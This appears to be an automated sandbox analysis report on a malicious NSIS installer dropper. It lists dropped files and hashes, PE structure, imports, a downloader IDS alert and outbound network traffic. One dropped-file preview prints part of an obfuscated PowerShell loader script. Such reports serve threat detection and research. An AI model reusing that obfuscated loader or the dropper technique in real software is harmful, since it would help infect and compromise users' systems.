                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tyb2a4cy.ksq.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Bevidstgjorde.ren

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Xjz8dblHDe.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):478461
                                                                  Entropy (8bit):1.2475162534380173
                                                                  Encrypted:false
                                                                  SSDEEP:1536:R/xRunV7hsXgfAfBz7Wr/dIoM1mI/hqrJPNOeam:1SV7bYfp7QIT41N2
                                                                  MD5:BF4A008DC0B6586BA5DC8205FFC7DF72
                                                                  SHA1:0D84F9EF7D25DAB9667BEA1FCD6892621B5BD404
                                                                  SHA-256:497253D655FA9BDCDF3058A1092EA37C5954FB532ED86F04DE1C7121784D1EA7
                                                                  SHA-512:71EDACB5E8E860D1D936F152C20609DEAD0E9F388099F2DD33D41DDBF2EA1AFB58A2C6BFFC484C2DF7565AF9C294F2C0D2F86AAA4740F19FDE1FE8A8B821F78B
                                                                  Malicious:false
                                                                  Preview:.._.`...............................................i.........................................`.........f...................Q................................M.....r..............^....................................4......................................................................O...=.h.........................q..X...............S........................|..........................................................................................................r.).....................a......................W...................X...........................................................M.. ...............3...........<....y........x....I..............................I~..................o..........................................@..........................................D..............................................................Q.....................................................c.......i.......................................................................)...............,...

                                                                  C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Sidelbende.Kar

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Xjz8dblHDe.exe
                                                                  File Type:ASCII text, with very long lines (3263), with CRLF, LF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):56433
                                                                  Entropy (8bit):5.3346988659493295
                                                                  Encrypted:false
                                                                  SSDEEP:1536:oVjo8ExmifsJ7BLrqJQjBKeJXIusH7QDSXzNzFlSQe:EurfszLRjkoY9H7ySXwQe
                                                                  MD5:57C63A0AB9D88E2B534816F9A1F1DC63
                                                                  SHA1:A0BAA5D70FA61FBBB4C41F76B67A71C5356DBC06
                                                                  SHA-256:501ABD115BC94A28B8EDA5115ADA6C9898F2142BA2D4D751D8E34ED50C59A21C
                                                                  SHA-512:97E311A42C02E6AEE32D0D07F5A5FE0781E0DCF5AA71AC6420094134C1D6E2831D76E57A15CD26B9E5032813CADD338101542DDEBA74BD991A0F35E378A886BE
                                                                  Malicious:true
                                                                  Preview:$Rumplier=$Orthoepies;..<#Brugerdefinerende Viscin Reglens Homoveratric Dynamoer #>..<#Umbos Afrejserne Preclassify Diluter #>..<#Ballelssers Tumefy Aeolsklavier Interrupts luderes #>..<#Finland Paasaas cykelklemme Bystrrelsernes Fajancen #>..<#Fabriksskorstenes Genkendelige Pibrochs Pallasite Tabours Unexpressively Perserne #>..<#Forretningstiders Fingerspidsfornemmelses Talordet Afstrmninger Sappanwood Housecoaten permutationists #>...$Diverge = @'.Figu .,iogr$ PlaiC anfaaCar onParabd Stanl ysteeMan osDiskknAdskiuSemplfPatenfDaseneBisecraf alr agoc yawnaKoraldAmbasiRiv la Valgn OmkolTi ieyLamen= Chu $Va iaFRumini laged Ant eToksii Regnc Fo.soHimplmP,ukkm IndkibrugesOtteksHomoca Non,r BlomyAge d; alsw.RetsmfgaffeuTa kenUndvrc,orkitKamufiBooksoZoolonPouts ForesAD ownn rikgDentnsBavostBrand6Gad k6R kla Smile(Henre$CarroC Ptila BagenFatald Remol ChuneEnto s drjenCrassu Jinjf PlisfMatereSafiar Bec ,Temp $GenneD antaiEli,ngKldereOverls Ddetm enotu S,mmtEmisstHurtieEskal)Polya Subo.{Micke

                                                                  C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Unapprovableness.Rep

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Xjz8dblHDe.exe
                                                                  File Type:TTComp archive data, binary, 2K dictionary
                                                                  Category:dropped
                                                                  Size (bytes):334835
                                                                  Entropy (8bit):7.650778184471853
                                                                  Encrypted:false
                                                                  SSDEEP:6144:X9LgzAQ9eDOSmjSNnusjVYpv03VvtWojp7aCVTokFHuKs1YLKKkw:ttQIDpoSJxY03VvtFjdaCVUW21YFkw
                                                                  MD5:DD9B0A705DB5C59511678CA31267FC96
                                                                  SHA1:FCBD759BE62F3F9D194BEC03049D58850390B25D
                                                                  SHA-256:24CD180CD81C342180876A44115F6C7949743A5FB64A4769161BE3A9ADB1D659
                                                                  SHA-512:3F79BD6AFA967EF812CBC2C7C7FD3967C44A94E688713D74EE0463F9ED6933FCE0C228763C204B23A3FBB475D102708B48F85F6B36122A1FFCF21CB16A52370D
                                                                  Malicious:false
                                                                  Preview:......dd.............................J.....ffff.........................A..O.y./...DD.r...............,..iiiiii.............zz.].[.(........b...|............................OO....__......bbb...L.|...'.......GGGG...........X.XX...<<<<..{{......U..d....tt...... .!....III........?.........w...llll.............e....5..||.s.....3.$..q.......................H....j.''.vv......&....b........bb.................................................''.......mmmm.b........$......................................~...OOOO..nnnnnn............j.................|.......w.EEE........W..................BB.........R.O.........z............QQQ.p.............................................MM...5.?....b.BBBB...~....).....................8....DD...............-...................=.u........~..........9..L......".)))............................................+.C...'......44.rr........._.....UUU............................... .........eeee...EEEEEEEE..........-..................AA.;;.-.``..................>>>>>>

                                                                  C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Xjz8dblHDe.exe

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Category:dropped
                                                                  Size (bytes):685600
                                                                  Entropy (8bit):7.744954090078911
                                                                  Encrypted:false
                                                                  SSDEEP:12288:Y2QJ9o2sW3B9o2G2/6SkwBUuUGL75w03eB9iDyZ/oDck6qlVhyWjX53XObV:Yv9o2sW3B9oV2iSkwBUuV7+3B9ifrlVY
                                                                  MD5:CDDE73A8F16B1279010F660E5AB67903
                                                                  SHA1:9257099B42E772EED82B5E488D44FE7422A8C43D
                                                                  SHA-256:BE0FBC1AFBC35AE095067C50DBD7CBC61451663C3D9821377BB15FEBCDFBCF50
                                                                  SHA-512:C99A18AAFA31DD36C3884D65B67116EEADCD4F3C629AD75EC4733C48AF2666C46FF99CB5A3DFE9632F8AE27960FC335B3A95314B2A819597F717F8BE9B3CEE7F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                  • Antivirus: Virustotal, Detection: 61%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:.....l3............@...........................?......'....@..........................................@=..|..........pl...............................................................................................text....d.......d.................. ..`.rdata...............h..............@..@.data...8.9..........|..............@....ndata........:..........................rsrc....|...@=..~..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Xjz8dblHDe.exe:Zone.Identifier

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                  C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\Yellowfin.pre

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Xjz8dblHDe.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):436009
                                                                  Entropy (8bit):1.2582605930205382
                                                                  Encrypted:false
                                                                  SSDEEP:768:hcdhFKp23vdhctpU19YKVceNXiajgLRY2hLsKf/LTWSs9D1bFuYRiQHlWrmcZE+t:T9ogp/vuFYha+YI6vuAYskfI2ByWSlq
                                                                  MD5:BA41A53F0CE12BDF6DDE858C1BB56E67
                                                                  SHA1:28CC8982281E9540750800B87B128ACF3E86E1B4
                                                                  SHA-256:0DDFC3936461A4A299A8B57D2EE5A4C11B057233AE905D2EBBB3641E4D9FD0CE
                                                                  SHA-512:77DDDF113CB001D489B2B4B39E5E953B03A76D72EEABAB0C82FFA8C8E1677755A75740A98D32871CB086AE65B0BD2EEE1319BD87C59CC98169ECBE60EE83348E
                                                                  Malicious:false
                                                                  Preview:.............;......................0........;.......................jh<.i....................................................B................O.(...................................................................................M....6....................c.............................:............A.........................#............@...............................................................................I...........\..........................k..................................H.............................................................................1.......l....?.[....................)*....~..........K..................................................D..................U.a............................C........................................................................=.............o.........................g...............1.......s..H................y.................t....[.....................i..........'p.................................g.....................$......

                                                                  C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Resultatopgrelses186\kakaosmrs.txt

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Xjz8dblHDe.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):356
                                                                  Entropy (8bit):4.234486179912683
                                                                  Encrypted:false
                                                                  SSDEEP:6:URWM/KBzGLFXivfRO5BViaS035LKlewERn62GFVhyzpFiqizhRc48RV1CnmMWIX+:UkgK4Lg3ROI0pLYT4Ahj3zKRV67WIXC7
                                                                  MD5:E514D8FDFF4A7AC568F2DED93DADB44E
                                                                  SHA1:DF81016124C8941F2D9F75B1BCB3D951F911626C
                                                                  SHA-256:687D18EA6077CE147AC2358AEF39F33119CC6C46A0A38C46AE444E75F595EE74
                                                                  SHA-512:E6E8734937C7F6CDF0FA3F25861A42CE31485555EF236B2922C0E90AA22C1B2D4BBB757AA13BF9C41948DAC261CF042565D2608074246000D479B143962B4CF3
                                                                  Malicious:false
                                                                  Preview:udkrystallisations kubong palisse duodesen raadighedsbelbene monoamino..hookman damperens varsel.endetarmsaabningens lection udvidelsestakts statometer diggers scandalized,ectocarpaceous carosella drattede stodderprinsen gingkoes,afvrgelsernes moravianized skotte.udsalgssteder fayal uafmrket svampelagenes mispronouncement forhaeng modemerne deskription..

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Entropy (8bit):7.744954090078911
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:Xjz8dblHDe.exe
                                                                  File size:685'600 bytes
                                                                  MD5:cdde73a8f16b1279010f660e5ab67903
                                                                  SHA1:9257099b42e772eed82b5e488d44fe7422a8c43d
                                                                  SHA256:be0fbc1afbc35ae095067c50dbd7cbc61451663c3d9821377bb15febcdfbcf50
                                                                  SHA512:c99a18aafa31dd36c3884d65b67116eeadcd4f3c629ad75ec4733c48af2666c46ff99cb5a3dfe9632f8ae27960fc335b3a95314b2a819597f717f8be9b3cee7f
                                                                  SSDEEP:12288:Y2QJ9o2sW3B9o2G2/6SkwBUuUGL75w03eB9iDyZ/oDck6qlVhyWjX53XObV:Yv9o2sW3B9oV2iSkwBUuV7+3B9ifrlVY
                                                                  TLSH:E1E40245B210C99BCAF5F1358566AB59D5B77CB14C224A8733D03B8AEEBEB116C0F813
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....

                                                                  File Icon

                                                                  Icon Hash:397d694151710f3c

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x40336c
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:true
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                  Authenticode Signature

                                                                  Signature Valid:false
                                                                  Signature Issuer:CN="Inveigh Reemploying Heidelberg ", E=Banjo@Vekseldriften.Sh, L=Pecan Gap, S=Texas, C=US
                                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                  Error Number:-2146762487
                                                                  Not Before, Not After
                                                                  • 13/05/2024 10:20:40 13/05/2027 10:20:40
                                                                  Subject Chain
                                                                  • CN="Inveigh Reemploying Heidelberg ", E=Banjo@Vekseldriften.Sh, L=Pecan Gap, S=Texas, C=US
                                                                  Version:3
                                                                  Thumbprint MD5:E5C922C84501E5DFC72F494895287176
                                                                  Thumbprint SHA-1:17A870C75EBD5EB7CA5EBDCEC76F7AA625F1F266
                                                                  Thumbprint SHA-256:F09703E28954269048EF4AD251C477AB375113D6B383566CEFBC7DD886D1D202
                                                                  Serial:0151E80376B2346BE55EAFFF3FA0C096E532DBFA

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  sub esp, 000002D4h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  push 00000020h
                                                                  pop edi
                                                                  xor ebx, ebx
                                                                  push 00008001h
                                                                  mov dword ptr [esp+14h], ebx
                                                                  mov dword ptr [esp+10h], 0040A2E0h
                                                                  mov dword ptr [esp+1Ch], ebx
                                                                  call dword ptr [004080A8h]
                                                                  call dword ptr [004080A4h]
                                                                  and eax, BFFFFFFFh
                                                                  cmp ax, 00000006h
                                                                  mov dword ptr [007A8A2Ch], eax
                                                                  je 00007F0BC10CE003h
                                                                  push ebx
                                                                  call 00007F0BC10D12B5h
                                                                  cmp eax, ebx
                                                                  je 00007F0BC10CDFF9h
                                                                  push 00000C00h
                                                                  call eax
                                                                  mov esi, 004082B0h
                                                                  push esi
                                                                  call 00007F0BC10D122Fh
                                                                  push esi
                                                                  call dword ptr [00408150h]
                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                  cmp byte ptr [esi], 00000000h
                                                                  jne 00007F0BC10CDFDCh
                                                                  push 0000000Ah
                                                                  call 00007F0BC10D1288h
                                                                  push 00000008h
                                                                  call 00007F0BC10D1281h
                                                                  push 00000006h
                                                                  mov dword ptr [007A8A24h], eax
                                                                  call 00007F0BC10D1275h
                                                                  cmp eax, ebx
                                                                  je 00007F0BC10CE001h
                                                                  push 0000001Eh
                                                                  call eax
                                                                  test eax, eax
                                                                  je 00007F0BC10CDFF9h
                                                                  or byte ptr [007A8A2Fh], 00000040h
                                                                  push ebp
                                                                  call dword ptr [00408044h]
                                                                  push ebx
                                                                  call dword ptr [004082A0h]
                                                                  mov dword ptr [007A8AF8h], eax
                                                                  push ebx
                                                                  lea eax, dword ptr [esp+34h]
                                                                  push 000002B4h
                                                                  push eax
                                                                  push ebx
                                                                  push 0079FEE0h
                                                                  call dword ptr [00408188h]
                                                                  push 0040A2C8h

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d40000x27cc0.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xa6c700x9b0.data
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x64000x6400eed0986138e3ef22dbb386f4760a55c0False0.6783203125data6.511089687733535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xa0000x39eb380x60009e0c528682cd2747c63b7ba39c2cc23unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .ndata0x3a90000x2b0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x3d40000x27cc00x27e003ff3f9c979a556a14466f3e7fca5a16aFalse0.5468566320532915data6.448700520091383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x3d44480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2851798178161599
                                                                  RT_ICON0x3e4c700xb85cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9977328587168404
                                                                  RT_ICON0x3f04d00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.4055857345299953
                                                                  RT_ICON0x3f46f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.48091286307053943
                                                                  RT_ICON0x3f6ca00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6081144465290806
                                                                  RT_ICON0x3f7d480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5914179104477612
                                                                  RT_ICON0x3f8bf00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6864754098360656
                                                                  RT_ICON0x3f95780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7044223826714802
                                                                  RT_ICON0x3f9e200x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.4371951219512195
                                                                  RT_ICON0x3fa4880x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.5173410404624278
                                                                  RT_ICON0x3fa9f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8156028368794326
                                                                  RT_ICON0x3fae580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.5255376344086021
                                                                  RT_ICON0x3fb1400x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.6418918918918919
                                                                  RT_DIALOG0x3fb2680x120dataEnglishUnited States0.5138888888888888
                                                                  RT_DIALOG0x3fb3880x11cdataEnglishUnited States0.6056338028169014
                                                                  RT_DIALOG0x3fb4a80xc4dataEnglishUnited States0.5918367346938775
                                                                  RT_DIALOG0x3fb5700x60dataEnglishUnited States0.7291666666666666
                                                                  RT_GROUP_ICON0x3fb5d00xbcdataEnglishUnited States0.648936170212766
                                                                  RT_VERSION0x3fb6900x2f0SysEx File - IDPEnglishUnited States0.4773936170212766
                                                                  RT_MANIFEST0x3fb9800x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                  Imports

                                                                  DLLImport
                                                                  KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                  USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                  SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                  ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2025-01-10T15:16:19.416438+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549787142.250.184.206443TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 10, 2025 15:16:18.355565071 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:18.355618000 CET44349787142.250.184.206192.168.2.5
                                                                  Jan 10, 2025 15:16:18.355751991 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:18.372869015 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:18.372909069 CET44349787142.250.184.206192.168.2.5
                                                                  Jan 10, 2025 15:16:19.028879881 CET44349787142.250.184.206192.168.2.5
                                                                  Jan 10, 2025 15:16:19.029679060 CET44349787142.250.184.206192.168.2.5
                                                                  Jan 10, 2025 15:16:19.029773951 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:19.029773951 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:19.029798031 CET44349787142.250.184.206192.168.2.5
                                                                  Jan 10, 2025 15:16:19.031336069 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:19.093213081 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:19.093234062 CET44349787142.250.184.206192.168.2.5
                                                                  Jan 10, 2025 15:16:19.112703085 CET44349787142.250.184.206192.168.2.5
                                                                  Jan 10, 2025 15:16:19.112843037 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:19.115257978 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:19.155335903 CET44349787142.250.184.206192.168.2.5
                                                                  Jan 10, 2025 15:16:19.416469097 CET44349787142.250.184.206192.168.2.5
                                                                  Jan 10, 2025 15:16:19.416539907 CET44349787142.250.184.206192.168.2.5
                                                                  Jan 10, 2025 15:16:19.416683912 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:19.416683912 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:19.416732073 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:19.416757107 CET44349787142.250.184.206192.168.2.5
                                                                  Jan 10, 2025 15:16:19.416770935 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:19.416816950 CET49787443192.168.2.5142.250.184.206
                                                                  Jan 10, 2025 15:16:19.441154957 CET49798443192.168.2.5142.250.185.193
                                                                  Jan 10, 2025 15:16:19.441211939 CET44349798142.250.185.193192.168.2.5
                                                                  Jan 10, 2025 15:16:19.441297054 CET49798443192.168.2.5142.250.185.193
                                                                  Jan 10, 2025 15:16:19.441730976 CET49798443192.168.2.5142.250.185.193
                                                                  Jan 10, 2025 15:16:19.441744089 CET44349798142.250.185.193192.168.2.5
                                                                  Jan 10, 2025 15:16:20.115997076 CET44349798142.250.185.193192.168.2.5
                                                                  Jan 10, 2025 15:16:20.116070986 CET49798443192.168.2.5142.250.185.193
                                                                  Jan 10, 2025 15:16:20.120846987 CET49798443192.168.2.5142.250.185.193
                                                                  Jan 10, 2025 15:16:20.120853901 CET44349798142.250.185.193192.168.2.5
                                                                  Jan 10, 2025 15:16:20.121184111 CET44349798142.250.185.193192.168.2.5
                                                                  Jan 10, 2025 15:16:20.121247053 CET49798443192.168.2.5142.250.185.193
                                                                  Jan 10, 2025 15:16:20.121644974 CET49798443192.168.2.5142.250.185.193
                                                                  Jan 10, 2025 15:16:20.163331985 CET44349798142.250.185.193192.168.2.5
                                                                  Jan 10, 2025 15:16:20.570818901 CET44349798142.250.185.193192.168.2.5
                                                                  Jan 10, 2025 15:16:20.570883989 CET44349798142.250.185.193192.168.2.5
                                                                  Jan 10, 2025 15:16:20.570947886 CET44349798142.250.185.193192.168.2.5
                                                                  Jan 10, 2025 15:16:20.571000099 CET49798443192.168.2.5142.250.185.193
                                                                  Jan 10, 2025 15:16:20.571054935 CET49798443192.168.2.5142.250.185.193
                                                                  Jan 10, 2025 15:16:20.576425076 CET49798443192.168.2.5142.250.185.193
                                                                  Jan 10, 2025 15:16:20.576447964 CET44349798142.250.185.193192.168.2.5
